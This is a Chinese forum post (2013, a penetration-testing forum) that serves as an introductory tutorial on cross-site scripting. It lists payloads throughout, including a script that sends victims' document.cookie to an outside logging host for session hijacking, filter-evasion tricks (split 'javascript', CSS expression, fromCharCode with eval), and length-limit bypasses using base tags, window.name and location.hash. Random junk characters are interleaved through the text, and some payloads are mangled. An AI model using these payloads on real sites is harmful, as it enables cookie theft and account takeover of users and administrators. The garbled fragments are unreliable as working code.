中国网络渗透测试联盟

标题: XSS跨站脚本攻击初探 [打印本页]
作者: admin    时间: 2013-1-11 21:36
标题: XSS跨站脚本攻击初探
XSS跨站脚本攻击的基本原理和SQL 注入攻击类似(个人观点),都是利用系统执行了未经过滤的危险代码,不同点在于XSS是一种基于网页脚本的注入方式,也就是将脚本攻击载荷写入网页执行以达到对网页客户端访问用户攻击的目的,属于客户端攻击。而SQL注入攻击将危险代码绕过正常的文本输入变为可执行的SQL执行语句从而操纵数据库,从而进一步探测、操纵数据库信息。属于服务器攻击?(菜鸟看法)。3 s% n- M# o: D  J2 {
XSS攻击前奏(XSS bug 检测)
$ o! @' [& O" ?) ^  1、最常见的最经典的XSS bug检测语句必然是! I  c; i, k2 z8 ^$ s
  <script>alert(/XSS/)</script>                                        ①
  E) Z: w: [! C& e) P  比如在存在XSS bug的留言板上写上留言①,当访问留言板网页时会弹出对话框:
# T; v. v/ c# e4 _8 c
. \8 I4 [0 L9 V, }& m6 E这表明我们输入的语句被原样写入的网页并被浏览器执行了.那么我们就有机会执行我们的脚本攻击载荷:) Z! p7 {4 Y' X5 c# a  o: |
<script src = http://www.labsecurity.org/xssbug.js></script>. Q  S) G/ h: u# [  c9 v
在我们的网络空间www.labsecurity.org上的xssbug.js代码可以是
2 q0 I( a3 X& {3 ~3 ?8 ^Var img = document.createElement(“img”);
1 |& ~: H' Y0 T3 HImg.src = “http://www.labsecurity.org/log?”+escape(document.cookie);
- T. T* o% r& G4 ndocument.body.appendChild(img);
9 `2 |" f5 R4 X4 D如果我们如上代码顺利执行,那么被攻击者在目标网站的登录cookie就写进了log.得到其cookie后,进行浏览器重新发包就可以以被攻击者身份登录目标网站.(被攻击者可以是普通用户也可以使网站超级管理员).
6 X+ _- a* x1 k  c5 q7 H# {  将窃取cookie的代码换成下载者地址就可以将下载者下载到存在下载者攻击漏洞的用户电脑上." ?+ M$ f3 b; Y( \" S; C
  也可以将代码换成目标用户在网站上的某些操作的 数据包脚本.促使在不知情的情况下”自愿”进行某些操作.7 Z% l- j# @" [1 M2 _- {5 m
  对于Cookie窃取的防御可以使IP绑定等方案了.+ ?" G& g0 L% k9 F
    M0 c3 B, C5 y
  既然存在XSS攻击那么程序员在开发时必然会进行某些危险关键字的过滤,以及限制用户的输入长度.这样即使存在xss漏洞.Hack也只能检测,却不能够写入攻击载荷(长度限制啊).2 O) \/ p8 ]; }4 D; T/ S; S
  利用IMG图片标记属性跨站6 r/ T2 d/ a* f- `
当然也可以像上面所说的在留言板中输入1 I" @' b8 B5 A; x$ ~
<img src=”javacript:alert(/XSS/)”></img>1 c7 y7 X0 x4 V& d1 T* B. `
这所说的不是这样是在用户上传图片时将图片路径修改为一段可执行的XSS测试脚本.
2 Y; {  D' c! ^3 Y如果存在XSS漏洞那么此类脚本就会被执行.这类脚本要闭合双引号”>”等.
& _+ O& O6 f, m6 V3 e* x2 u  利用DIV标签属性跨站  n1 n3 V( L7 y% i4 ^, W
<div style=”width:0;height:0;background:url(javascript:document.body.onload = function(){alert(/XSS/);};”></div>
% Q, E( s! l# ]% _/ J4 ^  利用已知事件攻击
1 l4 g  E1 H6 x移动特效字<marquee>文字</marquee>
8 Q# t) |" o7 a" F  <marquee onsB.<div style=”” onmouseenter=”alert(/XSS/)”>文字</div>5 m& ?6 a  u; p& H3 w
  构造事件 , e1 Y) Y! v. G4 Z- K' q, |& l% W7 H
<img style=”#” style=”TEST:e&shy;xpression(alert(/XSS/));”>& c) j+ _5 W0 ~$ |2 L( E: F
常用的事件构造
% J+ a( U: r4 ?. t# Q<font style = “TEST:e&shy;xpression(alert(/XSS/))”></font>) P$ D' B1 V% {8 U1 x' `* D
<li style = “TEST:e&shy;xpression(alert(/XSS/))”></li>: C3 w6 m) O/ ?; s5 j; t
<table style = “TEST:e&shy;xpression(alert(/XSS/))”></table>
9 b% H8 @8 |+ d8 g" D<a style = “TEST:e&shy;xpression(alert(/XSS/))”></a>
" V& c- ^' }# l+ {. G" A<b style = “TEST:e&shy;xpression(alert(/XSS/))”></b>
" U; I; u2 q7 Z<ul style = “TEST:e&shy;xpression(alert(/XSS/))”></ul>* o  r- }- i0 x$ `  ?1 b
<marque tyle = “TEST:e&shy;xpression(alert(/XSS/))”></marquee>
9 X; y$ C8 X- w突破程序员的过滤限制
$ h2 f! X. l) W% B( w( q. t  \- U  利用javascript换行与空格突破过滤4 z) h: L& I$ O# Z0 ?% h6 E
  <img src = j ava script:al er t(/XSS/)>///空格使用Tab键产生/ m' O9 Q8 f( }3 G" r7 }
  <img src = j( x, L4 n; _' c  x$ z, ~( Y
  ava script :a ler t(/xss/)>
  e5 H0 c8 s8 o" L6 K9 ?. ]8 W; f  利用注释<img src = “#”/**/onerror = alert(/XSS/)>
8 ]- [2 o$ G$ y9 F; {  转代码,绕过滤
  y7 Z: j! x' l+ T  使用大小写转换绕过过滤& Q7 Z% Q+ \  o
  使用进制编码
' ]1 V% [" h' D3 b  空格回车符
: L& {3 q0 v$ Q3 z  
9 X/ Z& i6 g, @8 u* `2 `+ n  JS 还原函数法
( v3 W9 E. Z# V/ R8 t4 F  String.fromCharCode()可以将ASCII编码还原成字符串,那么就可以eval(String.fromCharCode(97,108,101.....))
& }9 R2 z* k3 S7 c& W, f突破长度限制
5 I& x) R0 }  E0 b2 W; ?注释符闭合相邻的输入框达到合并的目的! ]8 I5 Q9 t$ G9 Y5 ?+ E; m
<input id = 1 type = “text” value=””/>
/ J/ d4 N; N; g<input id = 2 type = “text” value = “”/>
7 C& }" L- C+ G( u4 J2 V' a这样我们可以在第一个框中输入”>alert<!--: D, @' \2 l  H& ^0 @1 S) r
在第二个输入框中输入--><script>(/XSS/);</script>2 b. }$ C, g4 N0 h4 u
这样效果就是
* x. r& b) f# O( b( v' W<input id = 1 type = “text” value=”” <script>alert(/XSS/)</script>”/>4 _1 O. R; o: ?; P
使用<base>标签进行相对路径劫持1 U& O; r6 n* Q; s- G: g
<body>tart=”alert(/XSS/)”>文字</marquee>. l3 w& T7 A, q
<base href=”http://www.labsecurity.org”/>6 ]& i) i  |+ A8 z/ W: I
<img src = “evil.js”>9 j; W; ~- H0 L5 V  p( |
<body># C  j; [# n- c# s5 X* \, L
当我们没有使用base标签时evil.js是调用的服务器根目录下的evil.js脚本文件.当我们使用<base>脚本后.那么在此标签后的所有相对路径为我们设置的网站.
, O( i6 d) @# u% b% c因此可以先使用<base>脚本劫持,然后再写入<img src=”xxx.js”>突破长度限制.
# O+ B( H  l% a; q" m使用window.name进行字符串传递
) q9 m7 P1 [/ z, k: @在我们自己的构造的页面中写入如下代码
" H  t: _& Q8 b' m7 g" k<script>
" |3 X" I0 w1 f# _1 N5 M- jWindow.name=”<script src=http://www.labsecurity.org/xss.js><script>”. p9 E; w/ }  q- J( {" \
Window.location=”http://www.xxxx.com/xxx.asp
- H0 w9 u9 }; m! n* n% z; p</script>7 i- B; R" p6 F1 {
当我们跳转到目标网页时我们的window.name值为我们设置的跨站脚本语句.
! o" F% _- f- g: u因此我们可以使用eval(name)进行跨站攻击.& _5 O2 z3 M/ c
利用上下文扩展长度3 s8 W+ k+ T5 }# k; d1 Z
<div id="x">alert%28document.cookie%29%3B</div>
- S6 f2 I( s3 J9 U* ?<limited_xss_point>eval(unescape(x.innerHTML));</limited_xss_point>5 F8 R4 `/ w* v
上文是不限制长度的安全数据,那么我们就可以在下文中使用此安全数据.进行XSS攻击突破长度./ k+ z4 Y- o. M9 A+ Z( X" j& \
5.利用URL 中的数据" a. Q) Y& j6 u6 J- z, o& r9 n! z
如果页面里不存在上一节所说的可控HTML 上下文数据怎么办?有些数据是我们无条件可控的,第一个想到的就是URL,通过在URL 的尾部参数构造要执行的代码,然后在XSS点通过( U3 N2 J2 }8 t$ z* v7 o
document.URL/location.href 等方式获得代码数据执行,这里假设代码从第80 个字符开始到
- E3 Z, W) n5 u4 o- d$ r6 G& R9 X最后:
6 v/ I5 L3 o) M* W" y--code-------------------------------------------------------------------------
  F6 ?. \/ X9 G$ A8 G/ c6 Y5 e1 g6 U1 ehttp://www.xssedsite.com/xssed.php?x=1....&alert(document.cookie)
* \5 ~1 P/ Q* t1 c# L<limited_xss_point>eval(document.URL.substr(80));</limited_xss_point>
  H- m$ Q6 m. a9 e4 B( a% |长度:309 c( V* Q* l) r+ O- ~
<limited_xss_point>eval(location.href.substr(80));</limited_xss_point>6 K8 Y: ~& {* t+ s3 R* l1 l
长度:31
  u6 O" b$ y6 j上面两个例子对比,前一个例子更短,那么有没有办法更短呢?通过查阅Javascript 手册, l, e. y. A4 {6 t% c& n  W$ G
的String 的方法可以发现,切割字符串有一个更短的函数slice,5 个字符比substr 还要短一个字符:
: R  p% h  T( X<limited_xss_point>eval(document.URL.slice(80));</limited_xss_point>
" G" R; I3 c9 w9 M, S# b, p长度:29
6 K9 w0 ~3 M# u9 t8 j4 N<limited_xss_point>eval(location.href.slice(80));</limited_xss_point>
8 D/ t, J0 o# K0 Y长度:30
: Z* f) k- J. i' ~* x2 N; h- f那么还有没有办法更短呢?答案是YES,查阅一下MSND 里的location 对象的参考你会发现有个hash 成员,获取#之后的数据,那么我们可以把要执行的代码放在#后面,然后通过hash获得代码执行,由于获得的数据是#开头的,所以只需要slice 一个字符就可以拿到代码:
+ ^! L6 _4 W; x% k- [* uhttp://www.xssedsite.com/xssed.php?x=1....#alert(document.cookie)7 G4 }/ z( F; Y7 c  m( }, X: I
<limited_xss_point>eval(location.hash.slice(1));</limited_xss_point>
; Z5 \" o7 c3 a" h: O+ d长度:29, b" s! [# f; W, b
这样比上面的例子又少了一个字符。那么还可以更短么?
7 c; O3 z# c3 k  r7 H1 B. w6.剪切板clipboardData  R2 I8 u. k, j/ @. o8 Y+ A
攻击者在自己域的页面上通过clipboardData 把Payload 写入剪切板,然后在被XSS 页面获取并执行该数据。攻击者构造的页面:
; J0 Z6 d! [( k( U% {--code-------------------------------------------------------------------------
+ w6 W; ]5 A$ L2 e1 E& q$ ~<script>
# I1 c# C5 J" XclipboardData.setData("text", "alert(document.cookie)");7 z% ]3 u8 T/ D
</script>2 g, J, s5 a- Y$ _
-------------------------------------------------------------------------------
4 J& [, Z! M( l) [( A, q被XSS 的页面:+ `" W: o9 {- S. ]" k
--code-------------------------------------------------------------------------; v! _) s+ b8 `, N! p
<limited_xss_point>eval(clipboardData.getData("text"));</limited_xss_point>
+ `8 l9 N* i- h; _-------------------------------------------------------------------------------- ?, ~6 f+ v" o3 c9 R9 Q9 p, N
长度:36
( |$ r2 D8 v; j' V- y0 H7 _, ]这种方式只适用于IE 系列,并且在IE 7 及以上版本的浏览器会有安全提示



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2